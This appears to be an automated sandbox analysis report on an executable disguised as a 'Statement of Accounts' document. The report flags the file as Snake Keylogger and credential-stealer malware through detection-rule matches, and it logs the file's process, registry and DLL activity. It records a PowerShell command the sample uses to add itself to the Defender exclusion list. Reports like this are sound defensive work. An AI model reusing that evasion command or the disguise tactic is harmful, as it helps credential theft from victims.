Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/6@3/3

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Mutant created: \Sessions\1\BaseNamedObjects\WHDLdSBXjS
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqiqdzi5.v5r.ps1

Jump to behavior

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003DFC000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003E35000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003DEC000.00000004.00000800.00020000.00000000.sdmp, [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4612177769.0000000003E42000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Virustotal: Detection: 22%
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static file information: File size 1270784 > 1048576

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x135c00

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Gcz.pdb source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source:	Binary string: Gcz.pdbSHA256KA source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: 0xEC61F726 [Fri Sep 2 23:07:18 2095 UTC]

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 0_2_00007FF848CD1325 push esp; retf C45Fh	0_2_00007FF848CD44CF
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 0_2_00007FF848CD1325 push ebx; retf C45Fh	0_2_00007FF848CD461E
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 0_2_00007FF848CD2248 push cs; iretd	0_2_00007FF848CD224F
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 0_2_00007FF848CDCF5A push edx; ret	0_2_00007FF848CDCF5B
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CE0D28 push es; ret	5_2_00007FF848CE0D27
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CE0CDC push es; ret	5_2_00007FF848CE0D27
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CE0C90 push edx; ret	5_2_00007FF848CE0CDB
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CEDC47 pushad ; iretd	5_2_00007FF848CEDC4E
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CEC41C push 00000076h; iretd	5_2_00007FF848CEC424
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 5_2_00007FF848CEE63D push esi; iretd	5_2_00007FF848CEE63F

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
